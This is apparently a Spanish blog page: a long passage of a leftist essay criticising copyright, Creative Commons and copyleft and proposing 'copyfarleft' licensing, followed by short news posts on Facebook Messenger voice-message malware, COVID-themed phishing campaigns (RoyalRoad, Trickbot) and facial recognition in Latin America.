En una repetición sorprendente de las luchas por el copyright que emergieron por primera vez durante el romanticismo, los excesos de la forma capitalista de la propiedad intelectual se combaten utilizando el lenguaje y presuposiciones propias del capital. Creative Commons preserva las ideas románticas de originalidad, creatividad y derecho a la propiedad, y similarmente considera la “cultura libre” como una esfera separada que existe en aislamiento perfecto del mundo de la producción material. Desde el siglo XVIII las ideas de “creatividad” y “originalidad” estuvieron vinculadas inextricablemente con un anti-común de conocimiento. Creative Commons no es la excepción. Esta visión sobre el movimiento copyfight, un movimiento que incluye a Creative Commons, es inconsistente con la idea de “libertad” en la historia de la cultura libre. Por ejemplo, el periódico Internationale Situationniste, que existió desde los ’50 tardíos hasta principios de los ’70, era publicado con la siguiente declaración de copyright: “Todos los textos publicados en Internationale Situationniste pueden ser reproducidos libremente, traducidos o adaptados, incluso sin indicación de origen”.6

Incluso antes de esto, en un libro de canciones que Woody Guthrie distribuyó en los ’30 para los escuchas que querían saber las palabras de sus grabaciones, la siguiente nota fue incluida:

Esta canción tiene copyright en los Estados Unidos, bajo el Sello de Copyright #1540085, por un período de veintiocho años y cualquiera que sea encontrado cantándola sin nuestro permiso será considerado un gran amigo nuestro, porque nos importa un comino. Publícalo. Escríbelo. Cántalo. Báilalo. Yodéalo. Nosotros lo escribimos, y es todo lo que quisimos hacer.

(Miller, 2004).

En estos casos, lo que es evidente es que la libertad de la que se habla es la libertad del consumidor para usar y producir, no la “libertad” del productor para controlar. Si la cultura libre está realmente orientada a crear un stock común para la producción cultural entre pares, entonces el marco provisto debe diseñarse específicamente de forma tal que no pueda ser utilizado para atacar a la cultura libre. Los términos presentados por Woody Guthrie y la Internacional Situacionista pasan esta prueba. Creative Commons no. Los proponentes de la cultura libre deben ponerse firmes en negar el derecho al control del productor y en negar el refuerzo de la distinción entre productor y consumidor.

Software Libre: El copyright se come a sí mismo

Si la información copiable se vuelve escasa sólo mediante la aplicación de la ley, también puede hacerse abundante por ley. La práctica de utilizar la legislación del copyright misma como una forma de disentir con ella, llamada copyleft, creció prominentemente en el desarrollo de software y en el surgimiento de la comunidad del software libre.

La Licencia Pública General (GPL) fue la primer licencia copyleft bajo la cual una gran cantidad de software libre fue lanzado. Su inventor Richard Stallman afirma que en la era de la copia digital, el rol del copyright ha sido revertido completamente. Aún cuando comenzó como una medida legal para permitir a los autores restringir a los editores por el bien del público general, el copyright se ha convertido en el arma de los editores para mantener su monopolio imponiendo restricciones al público general, que ahora posee los medios para producir sus propias copias. El objetivo del copyleft en general, y de las licencias como la GPL en particular, es revertir esta reversión.

El copyleft utiliza la legislación del copyright volviéndola sobre sí misma para servir los propósitos opuestos. En lugar de promover la privatización, se convierte en una garantía de la libertad de todos para usar, copiar, distribuir y modificar el software o cualquier otra obra. Su única “restricción” es precisamente la que garantiza la libertad, es decir que los usuarios no tienen permitido restringir la libertad de nadie más ya que todas las copias y derivaciones deben redistribuirse bajo la misma licencia. El copyleft reclama la propiedad legalmente, sólo para subvertirla en la práctica, al permitir a todos usar la obra como prefieran mientras que el copyleft se mantenga. El reclamo meramente formal de la propiedad significa que nadie puede volver a poner la obra bajo copyright una vez que es copyleft, para intentar limitar su uso.

Las licencias copyleft garantizan libertad de la propiedad intelectual al requerir que la reutilización y redistribución de la información esté gobernada por las “cuatro libertades” definidas por la Fundación del Software Libre (FSF). Estas son las libertades de usar, estudiar, modificar y redistribuir.7 Puesto en contexto histórico, el copyleft descansa en algún lugar entre el copyright y el anti-copyright. El gesto de los escritores al poner en anti-copyright sus obras era hecho con un espíritu de generosidad, afirmando que el conocimiento puede florecer sólo cuando carece de propietarios. En tanto declaración de “ningún derecho reservado”, el anti-copyright era un eslógan perfecto lanzado en un mundo imperfecto. Se suponía que los demás usarían la información en el mismo espíritu de generosidad. Pero las corporaciones aprendieron a explotar la falta de copyright y redistribuir las obras por lucro.

A Stallman se le ocurrió la idea del copyleft en 1984, después que una compañía hizo mejoras a software que él había puesto en el dominio público (el equivalente técnico del anti-copyright, pero sin el gesto crítico), privatizó el código fuente y rehusó compartir la nueva versión. En este sentido, el copyleft representa un aprendizaje, una dolorosa lección de que la renuncia a todos los derechos puede llevar al abuso de los lucradores. El copyleft intenta crear unos comunes basados en derechos y responsabilidades recíprocos para respetar los derechos de otros usuarios. Todos pueden sumar a los comunes, pero nadie puede sustraer de ellos.

Pero en otro sentido el copyleft representa un paso atrás del anti-copyright y está plagado por una serie de contradicciones. La posición de Stallman está en línea con el consenso general de un copyright pervertido en una herramienta que beneficia a las corporaciones antes que a los autores a los que servía en un principio. Pero es importante destacar que no existe tal época dorada del copyright. El copyright siempre ha sido una herramienta legal. Al acoplar textos a autores, transformó ideas en mercancías para crear beneficios para los propietarios del capital.

Esta miopía específica sobre el copyright es parte de un desinvolucramiento general en cuestiones económicas. La “izquierda” del copyleft asemeja un tipo vago de libertarian8 opuesto a sistemas cerrados y opacos y a restricciones totalitarias en el acceso a la información, antes que al privilegio económico o la explotación del trabajo. El copyleft emergió de una ética hacker que se acerca a la persecución del conocimiento por el conocimiento mismo. Su objetivo principal es defender la libertad de la información contra las restricciones impuestas por “el sistema”, lo que explica en parte por qué existe una amplia gama de posturas políticas entre los hackers. También explica por qué la comunalidad que vincula a los hackers entre sí –la “izquierda” en la visión de Stallman sobre el copyleft– no es la izquierda entendida por la mayoría de los activistas políticos.

GPL y el copyleft son frecuentemente invocados como ejemplos de la tendencia anti-comercial del movimiento del Software Libre. Pero no hay tal tendencia. Las cuatro libertades requeridas por la GPL significan que cualquier restricción adicional, como una cláusula no comercial, convertiría a la obra en no-libre aún si cumple con algunas de las libertades. Mantener el software “libre” no previene a los desarrolladores vender copias que hayan modificado con su propio trabajo y tampoco previene la redistribución hecha por una compañía comercial cobrando una tarifa, mientras que la misma licencia sea utilizada y el código fuente siga siendo transparente.

Esta versión de la libertad no suprime el intercambio, como han proclamado algunos entusiastas del software libre, ni es incompatible con una economía capitalista basada en el robo de la plusvalía. La contradicción inherente en estos comunes se debe a un entendimiento de lo propietario como sinónimo de código cerrado o no transparente. “Propietario” significa tener un dueño que prohibe el acceso a la información y mantiene el código fuente en secreto, pero no necesariamente significa tener un dueño que extraiga un rédito, aunque mantener el código fuente en secreto y extraer rédito a menudo coincidan en la práctica. Mientras que las cuatro condiciones se cumplan, la redistribución comercial del software libre no es considerada propietaria.

Virtualmente cada oficina, academia y fábrica necesita de software para su trabajo diario. Para todas estas organizaciones, el valor de uso del software puede traducirse directamente en valor de cambio en el curso de su producción normal, no al venderlo, sino al realizar sus tareas habituales, vendiendo el producto de ellas y usando software para aumentar su productividad. Pagar por licencias de software y acordar con los términos restrictivos de estas no les conviene. En comparación con lo que David Ricardo dijo sobre los terratenientes, el interés de una compañía de software como Microsoft siempre está en oposición al de cada usuario de software.

Las organizaciones que utilizan software, sean escuelas, fábricas, oficinas y empresas de comercio electrónico, emplean colectivamente muchos más desarrolladores de software que las pocas compañías que venden software propietario, como Microsoft. Entonces, el software libre es muy atractivo para estas organizaciones ya que les permite reducir sus costos individuales de desarrollo manteniendo colectivamente un inventario común de activos de software. Entonces, el valor de uso del software libre es valorado por las organizaciones que pagan desarrolladores de software para trabajar en él, aunque no posean exclusivamente el copyright. Al patrocinar el software libre y el copyleft para recortar sus costos de producción, los gigantes tecnológicos como IBM tienen mucho en común con capitalistas liberales como David Ricardo, que trabajó para sobrepasar las ventajas que los terratenientes tenían sobre los capitalistas al, por ejemplo, reducir el precio de sus medios de producción.

Pero el software libre no fue concebido como una mera forma de reducir los costos corporativos de producción de software. Richard Stallman escribe en el sitio de web de su organización: “Mi trabajo por el software libre es motivado por un objetivo idealista: propagar libertad y cooperación. Quiero fomentar el software libre para reemplazar el software propietario que proscribe la cooperación y así mejorar nuestra sociedad.” (Stallman, 2010) Sin embargo, ya que el software libre no puede capturar directamente el valor de cambio, sus productores todavía deben vender su trabajo para lograr su subsistencia material. Por lo tanto el copyleft no es capaz de “mejorar la sociedad” en ningún sentido material, porque la mayor parte del valor de cambio creado por los productores del software libre es capturado por los propietarios de lo material que son los que proveen su subsistencia. Como el copyleft no puede hacer que los trabajadores acumulen riqueza más allá de su subsistencia, el copyleft por su cuenta no puede cambiar la distribución de activos productivos o su producto. Por lo tanto, el copyleft no tiene por sí mismo impacto directo en la distribución de riqueza y poder.

No todo el software libre es copyleft. Todo el software licenciado bajo los términos que proveen las cuatro libertades de la FSF es software libre. El software es copyleft cuando, además, prescribe que todas las obras derivadas lleven estas cuatro libertades. La pregunta que hay que hacerse es, ¿en qué grado beneficia realmente el copyleft al movimiento del software libre?

A pesar de ejemplos como los de la experiencia formativa de Stallman, cuando su software de dominio público fue apropiado y privatizado en 1984, existen también amplios contraejemplos de proyectos de software libre de gran escala que continúan utilizando licencias que permiten redistribución propietaria, como varios sistemas operativos basados en BSD y el enormemente popular servidor web Apache. Aunque una corporación puede utilizar código de estos proyectos en sus aplicaciones propietarias, lo hace costosamente. Al separar su desarrollo del proyecto de software libre principal, debe emparchar manualmente o reimplementar las mejoras de código de la distribución libre a su propia derivación y olvidarse de recibir ayuda de la comunidad del software libre para mejorar sus contribuciones propietarias. Esto significa que las compañías que eligen hacer versiones propietarias del software libre necesitan una fuerte razón comercial para hacerlo. En la práctica esto apenas sucede, porque las versiones propietarias tienden a caer rápidamente detrás de las versiones libres en cuanto a funcionalidad y por lo tanto pierden valor de mercado.

Los más exitosos ejemplos de utilización propietaria del software libre provienen de las compañías cuyo negocio principal es vender hardware, no software, como Apple Computer o los enrutadores Juniper, donde ambos utilizan versiones propietarias de software derivado de proyectos BSD. Debe notarse que tanto Apple como Juniper hacen software propietario no para venderlo, sino para embeberlo en su hardware costoso. Este punto se enfatiza con los esfuerzos de ambas compañías para evitar que los usuarios adquieran su software para utilizarlo en hardware más barato. Por ejemplo, considérense los ejemplos de Apple para frustrar el proyecto Hackintosh, que ofrece instrucciones para utilizar los sistemas operativos Mac en hardware no soportado, así como tomar acciones legales contra las compañías que venden hardware que no es de Apple cargado con copias legalmente adquiridas de su OS X (Keizer, s. f.).

Ejemplos como estos demuestran el énfasis de la libertad embebida en el copyleft. Las acciones de Apple no han amenazado a los proyectos de software libre basados en BSD de los que han tomado código. De hecho, Apple ha contribuido a estos proyectos. No obstante, los términos de las licencias de tipo BSD permiten que Apple agregue restricciones que les permite controlar a sus usuarios y negarles la libertad de utilizar el software que han adquirido legalmente como deseen. No hubieran tenido esta oportunidad si el software en el que basaran su sistema operativo fuera copyleft como Linux, que es publicado bajo la GPL.

Así como el copyleft es de alguna manera un retroceso de la posición ideológica del anti-copyright, la posición política del copyleft es un retroceso de la posición ideológica de la izquierda socialista. Aun cuando se apropia de argumentos de la izquierda en contra de la propiedad, el copyleft limita su crítica al estrecho campo de la propiedad inmaterial. Un ejemplo particularmente desvergonzado de esto es el “Manifiesto puntoComunista” de Eben Moglen (Moglen, 2003), un ofensivo pastiche del manifiesto seminal de Marx y Engels, que convierte aquella llamada a las armas a la clase trabajadora por la abolición del capitalismo, para sólo demandar la abolición de la propiedad intelectual. Los dos materialistas decimonónicos hubieran comprendido que la sola abolición de la propiedad intelectual no hubiera liberado a la clase trabajadora de sus cadenas. Moglen, profesor de leyes en la Universidad de Columbia y consejero maestro en la FSF de Stallman, falla en involucrarse en el problema de la institución misma de la propiedad, y por lo tanto no ha aprendido nada de la posición de los revolucionarios que intenta imitar.

Pero, a pesar de los retrocesos ideológicos y políticos que el copyleft representa, en el área del desarrollo de software, el copyleft se ha probado un medio tremendamente efectivo para crear un común informacional que beneficia ampliamente a aquellos cuya producción depende de este. En efecto, el surgimiento del movimiento del software libre es con justicia una inspiración para todos los que luchan por formas más equitativas de producir.

La izquierda socialista promueve la idea de que la riqueza debe ser justa y equitativamente distribuida y controlada por la gente que la produce. Tal vez el mejor método de alcanzar esto es a través de empresas decentralizadas controladas por sus trabajadores, cooperativas y consejos. Por la misma razón que las organizaciones capitalistas apoyan el software libre, porque representa un stock común de valor de uso que pueden aplicar a la producción, los productores con base en el común y por lo tanto todas las empresas auto-organizadas de obreros pueden beneficiarse de tal stock común de software copyleft e incorporar a desarrolladores de software en sus empresas colectivas.

El software libre es por lo tanto valioso para la producción auto-organizada de los obreros, al darnos una valiosa fuente de capital, software que previamente hubiera sido controlado con exclusividad por corporaciones propietarias ahora nos da la posibilidad de retener una mayor porción del producto de nuestro trabajo. Tal vez tan importante como esto es la forma en que la comunidad del software fue pionera en la organización cooperativa de proyectos distribuidos de gran escala, aunando contribuidores dispersos internacionalmente para trabajar en el desarrollo de software valioso. De esta manera, el movimiento del software libre realiza contribuciones importantes hacia el objetivo de “organizar industrialmente [y] formar la estructura de una sociedad nueva dentro de la cáscara de la vieja”, el ideal histórico de los Trabajadores Industriales del Mundo (IWW, s. f.).

La Cultura Libre necesita una Sociedad Libre: El Copyfarleft

A pesar del rol beneficioso del copyleft para formar un valioso stock común de software, se vuelve problemático cuando el modelo es forzado en el dominio del arte y la cultura del que nació el disenso contra la propiedad intelectual. Las obras culturales, a diferencia del software, son bienes de consumo, no una herramienta para utilizar en la producción, es decir un bien de producción. Los bienes de producción, como se mencionó antes, son los activos utilizados en la producción, como las herramientas y el equipamiento necesario para producir bienes de consumo que se venden por rédito. La demanda del capital es distinta de la demanda del consumo. La demanda del capital es la demanda de bienes de producción; la demanda del consumo es la demanda de bienes de consumo. El capitalismo no necesita realizar su ganancia en la producción de bienes de capital porque las ganancias se hacen a través del control de la circulación de bienes de consumo. Todo aquello que baje el costo del capital aumenta consecuentemente el beneficio potencial que podrá ser capturado en la venta de esos bienes. Fracasar en comprender la diferencia entre demanda del capital y demanda del consumo propaga el mito de que el éxito del software libre puede ser una plantilla para la cultura libre. Bajo el capitalismo, sólo el capital puede ser libre. Es por esto que el software puede ser libre, pero la cultura no puede serlo sin otros cambios más fundamentales en la sociedad.

El arte no es, en la mayoria de los casos, una necesidad común de la producción como lo es el software. Entonces, su demanda es una demanda de consumo, no de capital. Existen ciertamente casos en los que las obras artísticas pueden considerarse necesidades productivas, como los efectos de sonido, el clipart, clips musicales y otros similares y la tradición de los artistas de basarse en la obra de sus predecesores se ha discutido largamente más arriba; sin embargo, cuando discutimos la economía de las obras de contenido, como los poemas, novelas, películas o música, así como el software de entretenimiento como los juegos, no estamos hablando de bienes de producción, sino de bienes de consumo. Las editoras capitalistas y los gigantes de la industria del entretenimiento apoyarán la creación de software copyleft para emplearlo en su producción. No obstante, en la mayoría de los casos, no apoyarán la creación de arte copyleft. Por qué lo harían, si el arte es un bien de consumo y la industria no está en el mercado para regalar bienes de consumo. Están en el mercado para, no obstante, obtener ganancias al controlar la distribución de bienes de consumo.

Como toda la información copiable y reproducible, las obras de contenido no tienen valor de cambio directo y a diferencia del software, raramente poseen valor de uso en la producción. El valor de uso existe sólo entre los fanáticos de estas obras y si los propietarios no pueden obtener dinero de esos fanáticos por el derecho a copiar, ¿por qué financiarían la producción? Y si los propietarios no apoyarán el arte copyleft, que es distribuido libremente, ¿quién lo hará? La respuesta no es clara. En algunos casos, son instituciones culturales estatales o privadas, pero estas sólo pueden soportar un pequeño número de artistas y eso sólo aplicando dudosos y en última instancia arbitrarios criterios de selección para decidir quién y quién no recibe ese financiamiento.

El problema resulta obvio cuando se intenta traducir el copyleft a las obras culturales. Si alguien libera una novela bajo una licencia copyleft y Random House la imprime y obtiene ganancias de esa obra, Random House no ha violado el copyleft mientras lo haya aplicado en su edición. Ser “libre” significa estar abierto a la apropiación comercial, ya que la libertad en términos del copyleft se define por la circulación irrestricta de información antes que libertad de la explotación. No es una sorpresa que la mayor aplicación de copyleft en la producción de obras artísticas, música y textos sea la de permitir la copia, modificación y redistribución mientras sea en términos no comerciales.

Wu Ming, un grupo de autores anti-propiedad intelectual de Italia, proclama que es necesario restringir el uso comercial, o el uso lucrativo, para proscribir la explotación parasitaria de los trabajadores culturales. Justifican esta restricción y su divergencia de la versión del copyleft de la Licencia Pública General, en base a que la lucha contra la explotación y la lucha por la remuneración justa del trabajo son la piedra fundacional histórica de la izquierda. Otros proveedores de contenido y editores de libros, Verso por ejemplo, han expandido esta restricción reclamando que la copia, modificación y redistribución no sólo debe ser no lucrativa, sino también en el espíritu del original, sin explicar qué es lo que este “espíritu” significa.

Indymedia de Rumania ha revisado su definición de copyleft para aclarar el significado de “en el espíritu del original” luego de tener problemas con el sitio web neo-fascista Altermedia Rumania, cuyas “jodas” fueron desde secuestrar el dominio indymedia.ro a copiar textos de Indymedia mintiendo sobre nombres y fuentes. Las restricciones de Indymedia Rumania incluyen la no modificación del nombre original y la fuente porque se opone al deseo de transparencia, no reproducir el material lucrativamente porque abusa el espíritu de generosidad y no reproducir el material en un contexto que viole los derechos de individuos y grupos al discriminarlos por nacionalidad, etnicidad, género o sexualidad porque contraviene su compromiso con la igualdad.

Otras versiones del copyleft han intentado añadir otras restricciones basándose en una interpretación fuerte de la “izquierda” de copyleft, utilizando principios positivos en lugar de la libertad negativa basada en restricciones, como valor la cooperación social sobre el lucro, la participación no jerárquica y la no discriminación. Las definiciones más restrictivas del copyleft intentar fundar un común informacional que no se trate sólo de la libre circulación de información, sino como parte de un movimiento social más grande que basa su comunalidad en principios izquierdistas compartidos. En sus varias mutaciones, el copyleft representa un abordaje pragmático, racional, que reconoce que los límites de la libertad se encuentran en los derechos y responsabilidades recíprocos. Estas diversas restricciones representan interpretaciones divergentes sobre cómo deben ser estos derechos y responsabilidades. Aún así, dadas las pobres condiciones económicas de la mayoría de los artistas que se reservan el copyright completo, el prospecto de la mutaciones no comerciales del copyleft para mejorar las condiciones económicas de los artistas parece remota.

La ventaja principal de la reserva de los derechos comerciales de un artista es la habilidad de licenciar la obra a la industria del entretenimiento bajo otros términos; ya que es comercial, no califica para el acceso libre bajo los términos de la licencia no comercial. Sin embargo, los artistas carecen de recursos para manufacturar y distribuir en una escala comercial. Entonces, necesitan de hecho a aquellos que poseen el capital para hacerlo y no pueden negociar nada más que su subsistencia. En esencia, vender sus ideas es como para otros trabajadores vender su trabajo. Esto se ilustra en “Ganancias de los artistas musicales y digitalización: una revisión de datos empíricos en Inglaterra y Alemania” de Martin Kretschmer, Profesor de Jurisprudencia de la Información en la Universidad Bournemouth, donde concluye que “los creadores tienen poco para ganar de la exclusividad” (Kretschmer, s. f.). Similarmente, en su estudio “Evidencia empírica de las ganancias por copyright” del 2006, dice: “Las ganancias del no-copyright, e incluso de las actividades no artísticas, son una fuente importante de ingresos para muchos creadores” (Kretschmer, 2006). Este estudio incluye muchas cifras sorprendentes. Por ejemplo, el pago medio distribuido por la Performing Right Society (Reino Unido) en 1994 a los detentadores de copyright fue de £84 (Kretschmer, 2006).

Mientras que los términos no comerciales podrían proveer una forma de integrar a los artistas que producen cultura libre a la de otra forma propietaria industria del entretenimiento, no la desafían ni abordan la explotación embebida en ella. Los términos no comerciales resultan muy problemáticos para aquellos en la izquierda socialista que militan por la producción auto-organizada de los trabajadores, ya que estos términos también restringen la habilidad de estas empresas no capitalistas para reproducir tales obras. Entonces, tales licencias van en detrimento no sólo de los intereses de los artistas sino también de todos los trabajadores porque no son compatibles con el objetivo general de la izquierda socialista: la creación de una economía controlada por los trabajadores.

Para que el copyleft transmute en un instrumento revolucionario en el dominio de la producción cultural, debe convertirse en “copy-far-left” (extremaizquierda de copia). Debe insistir en la propiedad de los trabajadores sobre los medios de producción. Las obras mismas deben formar parte de ese stock común y estar disponibles para su uso productivo por otros productores con base en el común. Mientras los autores se reserven el derecho a hacer dinero de sus obras y prevengan a otros productores basados en el común hacerlo, sus obras no pueden considerarse parte del común en lo absoluto, son obras privadas. Una licencia copyfarleft no debe restringir el uso comercial, antes bien el uso que no está basado en el común.

Específicamente, el copyfarleft debe poseer un grupo de reglas para aquellos que están trabajando en el contexto de la propiedad comunal de los trabajadores y otro para aquellos que emplean la propiedad privada y el trabajo asalariado en la producción. Una licencia copyfarleft debe posibilitar a los productores a compartir libremente y también a retener el valor del producto de su trabajo. En otras palabras, debe ser posible para los trabajadores obtener una remuneración aplicando su trabajo a la propiedad mutua, pero imposible para los propietarios de la propiedad privada obtener ganancias del trabajo asalariado.

Entonces, bajo una licencia copyfarleft, una imprenta cooperativa controlada por sus trabajadores sería libre de reproducir, distribuir y modificar el stock común como deseen, pero una imprenta privada se vería impedida de obtener acceso libre. De esta forma, el copyfarleft se mantiene libre en el mismo sentido que el copyleft, a pesar de las restricciones a la redistribución propietaria. El copyfarleft proscribe la sustracción del común, no las contribuciones a él.

Una licencia copyfarleft permitiría el uso comercial con base en el común al tiempo que niega la posibilidad de obtener rédito explotando el trabajo asalariado. El abordaje copyleft no comercial no hace ninguna de las dos cosas, previene el comercio basado en el común mientras que no restringe efectivamente la explotación asalariada porque esto requiere un cambio en la distribución de la riqueza. El copyleft provee una fundación sólida para el software en la producción basada en el común. El copyfarleft podría proveer una base funcional para las obras culturales y además convertirse en un stock común empleado por productores independientes. Sólo la promoción de una economía de los trabajadores, no sólo la prevención del uso comercial, puede cambiar la distribución de la riqueza.

Sin embargo, para que el copyfarleft tenga un impacto real, necesitaría ser empleado en el contexto de una naciente economía de los trabajadores que incluya varias formas de producción, por ejemplo culturales y materiales (arte tanto como comida, etc.) En ausencia de tal ambiente, el copyleft y sus variedades poseen poca ventaja para la mayoría de los artistas, para quienes el prospecto de ganancia financiera a través del licenciamiento comercial es despreciable. Para estos artistas, el anti-copyright mantiene un fuerte atractivo. El anti-copyright es un gesto radical que rechaza transigencias pragmáticas y busca abolir la propiedad intelectual toda. El anti-copyright afirma una libertad absoluta y no reconoce límites para su deseo.

Mientras que algunas mutaciones del copyleft han multiplicado las restricciones, otras han rechazado cualquier tipo de restricción, incluyendo la sola restricción impuesta por el copyleft inicial. Es el movimiento alrededor de la compartición entre pares lo que más se acerca al gesto del anti-copyright. El mejor ejemplo de esto es el blog Copyriot de Rasmus Fleischer del Piratbyrån (Buró de Piratería), un think tank anti-propiedad intelectual y los alguna vez fundadores de Pirate Bay, el más conocido sitio BitTorrent de la comunidad P2P. El leit motiv de Copyriot es “Sin copyright. Sin licencia”. Pero existe una diferencia con respecto a la vieja tradición anti-copyright. Fleischer afirma que el copyright se ha vuelto absurdo en la era de la tecnología digital porque debe recurrir a toda suerte de ficciones, como distinciones entre subidas y bajadas o entre productor y consumidor, que no tienen existencia real en una comunicación horizontal entre pares.

El Piratbyrån rechaza el copyright completamente, pero no porque está fallado de fábrica, sino porque fue inventado para regular una costosa máquina de una sola vía como la imprenta y ya no se corresponde con las prácticas que han sido posibilitadas por las actuales tecnologías de la reproducción. Sin embargo, a pesar de lo absurdo de las ficciones en que descansa el copyright, el contexto político más amplio sugiere que los modelos inspirados en el copyleft también tienen un rol importante que jugar. El rechazo total del ambiente legal no siempre es posible cuando se toman en cuenta las consideraciones prácticas. Construir formas alternativas de producir y compartir, “construir la sociedad nueva en la cáscara de la vieja”, requiere que operemos dentro del sistema legal capitalista donde la lógica de captura y explotación está embebida. Aunque existe el espacio para gestos desafiantes, debemos ponernos a buscar las formas y estructuras requeridas para construir y expandir el común. Resulta claro que restricciones como las del copyleft y el copyfarleft sirven para proteger el común y mantenerlo libre.

Mientras exista el copyright, las licencias con inspiración copyleft continuarán siendo necesarias para permitir la libertad intelectual dentro del régimen del copyright. Sólo cuando los trabajadores hayan realizado su rol histórico y creen una sociedad sin clases, podremos crear una cultura realmente libre sin restricciones.

Malware en mensajes de audio en Facebook

Publicada el 09/04/2020 - 02/08/2021 por Anonymous Chile

Los usuarios de redes sociales siempre han estado expuestos a las campañas maliciosas. En esta ocasión, los especialistas en de una consultoría de protección de datos reportan la aparición de una variante de virus oculto en mensajes de voz de Facebook Messenger. Esta es parte de una campaña de distribución de troyanos y otros tipos de malware vía supuestos mensajes de voz enviados a los usuarios de esta plataforma de mensajería. Se menciona que los actores de amenaza ya han infectado a usuarios en todas partes del mundo.

Los especialistas de la consultoría de protección de datos advierten a los usuarios sobre la posibilidad de recibir este virus de mensaje de voz desde una cuenta de Facebook Messenger hackeada o falsa. Si bien el mensaje no desencadena la instalación del malware por sí mismo, sí podría redirigir al usuario a otros sitios web, controlados por los actores de amenazas e infestados de amenazas informáticas como troyanos, ransomware, software para el minado de criptomoneda y awdare.

Esta podría ser una amenaza de seguridad altamente severa, pues los usuarios nunca imaginarían que una nota de voz recibida vía Facebook Messenger puede contener malware o un enlace malicioso. Además, en los peores casos, el malware podría ejecutarse directamente al presionar el mensaje de voz recibido.

El envío de mensajes a usuarios individuales no es el único vector de ataque empleado por los actores de amenazas. Los expertos de la consultoría de protección de datos señalan que los cibercriminales también podrían realizar publicaciones en múltiples grupos, etiquetar a cientos de usuarios y redirigirlos a sitios externos.

Acorde al Instituto Internacional de Seguridad Cibernética (IICS), esta clase de infecciones puede pasar completamente desapercibida para los usuarios con pocos conocimientos en ciberseguridad, por lo que no detectarán nada anormal hasta que la infección se complete. Además, esta variante de malware ha demostrado ser capaz de inhabilitar los sistemas antimalware en dispositivos móviles, por lo que el riesgo incrementa.

Por otra parte, los usuarios con mayores conocimientos pueden detectar indicios como aumento en el consumo de recursos del dispositivo, aparición de íconos de aplicaciones desconocidas o procesos no identificados en el controlador de tareas. Hasta el momento la compañía no se ha pronunciado al respecto.

Por prevención, se recomienda a los usuarios de Facebook Messenger ignorar cualquier mensaje enviado por un usuario desconocido, además de hacer caso omiso de publicaciones sospechosas. No hacer clic en enlaces a sitios de terceros también es una opción recomendable.

Malware aprovecha difícil situación por Coronavirus

Publicada el 09/04/2020 - 02/08/2021 por Anonymous Chile

Un grupo APT chino ha aprovechado el flujo de noticias y alerta general en torno a la expansión del Coronavirus, para orquestar un ciberataque “Sobre la propagación de nuevas infecciones de Coronavirus”. Así lo aseguran los investigadores de Check Point Research, la división de Inteligencia de Amenazas de Check Point quienes aseguran haber detectado un ciberataque de suplantación de identidad dirigido al Ministerio de Relaciones Exteriores de Mongolia y envío documentos adjuntos maliciosos a través de correos electrónicos a los funcionarios del país. El objetivo era persuadirles, utilizando mensajes centrados en la situación actual con respecto a este virus, para que dieran a los cibercriminales de este grupo acceso remoto a la red y dejaran una puerta abierta para el robo de información confidencial.

Asimismo, los expertos de la compañía señalan que uno de los dos documentos relacionados con COVID-19, se titulaba “Sobre la propagación de nuevas infecciones de Coronavirus” e incluso citaba al Comité Nacional de Salud de China. Check Point pudo rastrear el ciberataque y detectar la autoría gracias a la extracción de las huellas dactilares que dejaron los hackers en el propio código del malware almacenado en sus servidores, que estuvieron al descubierto durante unos segundos en Internet. Gracias a esos datos, los investigadores pudieron descubrir el origen de la cadena, concluyendo que el grupo chino APT estuvo operando desde 2016 y tiene como objetivo habitual diversas entidades públicas y empresas de telecomunicaciones de distintos lugares del mundo: Rusia, Ucrania, Bielorrusia y ahora Mongolia.

¿Cómo han llevado a cabo esta campaña masiva de malware?

Este grupo de cibercriminales infectaba los archivos adjuntos con un virus conocido como RoyalRoad, que descarga un archivo en la carpeta de inicio de Word para llevar a cabo una “técnica de persistencia”, que consiste en que cada vez que inicia esta aplicación, se inicia una cadena de infección en todos los archivos con extensión WLL. De esta forma, independientemente del archivo que se abra con Word, se produce la descarga de malware que infecta el equipo del usuario y permite acceder y robar grandes cantidades de información sensible

Este hecho, pone de manifiesto cómo los cibercriminales aprovechan temáticas variadas para lanzar campañas masivas de ciberataques. Sin ir más lejos, la compañía señala que ha registrado más de 4.000 dominios relacionados con el Coronavirus en todo el mundo, y que estos dominios son un 50% más maliciosos que la media.

“El COVID-19 no sólo representa una amenaza física, sino también una ciberamenaza. En este sentido, nuestra investigación pone de manifiesto que un grupo chino de APT aprovechó el interés público sobre todo lo relacionado con el Coronavirus para su propio beneficio, por lo cual decidieron utilizarlo como una novedosa cadena de infecciones informáticas”, señala Lotem Finkelsteen, jefe de Inteligencia de Amenazas de Check Point.

El coronavirus, también protagonista de una campaña de spam

Este no es el único ataque asociado al coronavirus descubierto. Los laboratorios SophosLabs han descubierto un nuevo ataque de spam activo en Italia realizado mediante emails que incluyen un documento que se ejecuta automáticamente y que contiene el malware Trickbot. Este ciberataque aprovecha el miedo al coronavirus y ofrece un documento en el que los usuarios pueden hacer clic para, supuestamente, conocer una lista de precauciones a tomar para evitar la infección. Desafortunadamente, el documento es un arma de ataque.

Según SophosLabs, el uso del COVID-19 en mensajes de spam puede ser nuevo, pero los mecanismos usados para enviar este tipo de mensajes son similares o idénticos a los utilizados en campañas de Trickbot, un troyano que han estado activo durante al menos los últimos 6 meses. Estos mecanismos incluyen “bots” de spam para enviar los mensajes, un documento adjunto cifrado y un software que instala el malware en el ordenador – dropper – utilizando el lenguaje de programación JavaScript.

A parte de los ataques que utilizan el coronavirus como excusa para aumentar sus posibilidades de infectar a un mayor número de usuarios, la expansión del brote ha obligado a gobiernos de todo el mundo a tomar nuevas medidas de seguridad para impedir una epidemia masiva: muchas empresas (entre las que se encuentran los principales gigantes tecnológicos como Amazon, Microsoft o Facebook) están implementando el teletrabajo como medida alternativa hasta que la situación mejore pero, muchas veces los usuarios no conocen las medidas básicas a llevar a cabo para tele trabajar de forma segura. Por eso, hace unos días os compartimos algunas de las claves en términos de ciberseguridad para teletrabajar desde casa de forma segura.

La sociedad exige explicaciones sobre la implementación de sistemas de reconocimiento facial en América Latina

Publicada el 08/04/2020 - 02/08/2021 por Anonymous Chile

Mientras los gobiernos siguen ignorando las innumerables evidencias internacionales que comprueban los sesgos y fallas de las tecnologías biométricas de vigilancia, organizaciones de la región cuestionan la ausencia de compromisos con la transparencia, participación y protección de los derechos de las poblaciones afectadas.

